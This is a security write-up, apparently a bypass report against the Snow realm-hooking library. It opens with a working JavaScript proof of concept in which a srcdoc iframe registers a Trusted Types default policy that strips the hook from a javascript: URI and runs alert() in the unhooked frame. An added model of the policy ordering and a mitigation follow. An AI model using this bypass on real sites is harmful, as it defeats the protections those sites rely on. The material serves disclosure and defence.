// Bypass PoC: drop a srcdoc frame that turns on Trusted Types enforcement,
// registers an attacker-controlled default policy, then loads a javascript:
// URI in a nested frame and calls alert() on that (no longer hooked) realm.
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
<iframe srcdoc="
<meta http-equiv='Content-Security-Policy' content=&quot;require-trusted-types-for 'script';&quot;>
<script>
// Default policy: HTML passes through untouched, but every script handed to a
// Trusted Types sink (including the body of the javascript: URI) becomes ''.
trustedTypes.createPolicy('default', { createHTML: s => s, createScript: function (s) { return ''; } });
// Once the nested frame exists, call alert on its realm from here.
setTimeout(() => frames[0].alert(1), 100);
</script>
<iframe src=\'javascript:alert(1)\'></iframe>"></iframe>
`;
The idea was to take advantage of the Trusted Types default policy to break the "atomicity" of the hooks (i.e., the malicious policy gets called after the hooks, but before the actual HTML/script assignment). There are several different directions; here I just use createScript to break the internal SNOW_WINDOW(this) in the javascript: URI :)
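The ordering the report relies on, as an added model that is not code from the bypass report or from the Snow project: a wrapper prepares a javascript: URL by prepending a hook marker, the browser then consults the Trusted Types default policy, and only then does the script run, so a page-owned default policy sees and can strip whatever the wrapper added. The model goes one step beyond the report and shows the ordering that survives it: the default policy can be registered only once per realm, so whichever side calls createPolicy('default') first owns the last step before execution. Everything here is hypothetical: the marker string HOOK_MARKER, the wrapper protectedSetSrc(), the sink model navigateJavascriptUrl(), and the small stand-in for window.trustedTypes that lets the model run outside a browser.

```javascript
// Added example, not the report's or Snow's code. Hypothetical marker standing in
// for whatever prefix the real hook injects into a javascript: URI.
const HOOK_MARKER = 'SNOW_WINDOW(this);';

// Minimal stand-in for window.trustedTypes (assumption: follows the spec rule that
// a second createPolicy('default') in the same realm throws TypeError). Real
// policies return TrustedScript objects; the stand-in returns plain strings.
function makeTrustedTypesStandIn() {
  let defaultPolicy = null;
  return {
    get defaultPolicy() { return defaultPolicy; },
    createPolicy(name, rules) {
      if (name === 'default' && defaultPolicy !== null) {
        throw new TypeError('Policy with name "default" already exists.');
      }
      const policy = {
        name,
        createScript(input) {
          if (typeof rules.createScript !== 'function') {
            throw new TypeError('Policy has no createScript rule.');
          }
          return String(rules.createScript(String(input)));
        },
      };
      if (name === 'default') defaultPolicy = policy;
      return policy;
    },
  };
}

// Model of the sink: navigating a frame to a javascript: URL. The body is routed
// through the default policy (when one exists) immediately before it executes,
// i.e. after any wrapper that prepared the value. Returns the script that would run.
function navigateJavascriptUrl(tt, url) {
  if (!url.startsWith('javascript:')) throw new Error('not a javascript: URL');
  let body = url.slice('javascript:'.length);
  if (tt.defaultPolicy !== null) body = tt.defaultPolicy.createScript(body);
  return body;
}

// Model of the hook library's wrapper around the sink: prepend the marker so the
// new realm is hooked before the page's own code runs there.
function protectedSetSrc(tt, url) {
  const hooked = 'javascript:' + HOOK_MARKER + url.slice('javascript:'.length);
  return navigateJavascriptUrl(tt, hooked);
}

// Scenario 1 (the report): the page registers 'default' first. The wrapper still
// adds the marker, but the policy runs afterwards and replaces the whole body with
// '', so the new realm is created without the hook and the parent can call into it.
function attackerOwnsDefault() {
  const tt = makeTrustedTypesStandIn();
  tt.createPolicy('default', { createScript: function (s) { return ''; } });
  return protectedSetSrc(tt, 'javascript:alert(1)');
}

// Scenario 2 (mitigation): the hook library claims 'default' before any page
// script runs. The page's own createPolicy('default') then throws, and because the
// default policy is the last step before execution, it can also re-insert the
// marker on a javascript: URL that reached the sink without going through the wrapper.
function protectorOwnsDefault() {
  const tt = makeTrustedTypesStandIn();
  tt.createPolicy('default', {
    createScript: s => (s.startsWith(HOOK_MARKER) ? s : HOOK_MARKER + s),
  });
  let attackerBlocked = false;
  try {
    tt.createPolicy('default', { createScript: function (s) { return ''; } });
  } catch (e) {
    attackerBlocked = e instanceof TypeError;
  }
  return {
    attackerBlocked,
    viaWrapper: protectedSetSrc(tt, 'javascript:alert(1)'),
    direct: navigateJavascriptUrl(tt, 'javascript:alert(1)'),
  };
}

console.log('attacker owns default ->', JSON.stringify(attackerOwnsDefault()));
console.log('protector owns default ->', protectorOwnsDefault());
```

Two caveats apply to the mitigation in a real page. A default policy is per realm, so the protector has to claim it in every frame it hooks, and it must also implement createHTML and createScriptURL, because once require-trusted-types-for is enforced every string reaching those sinks goes through the same policy and an incomplete one breaks the page's own code. The win is purely about ordering: it holds only if the protector's script runs before any page script, which is the assumption a hooking library already makes.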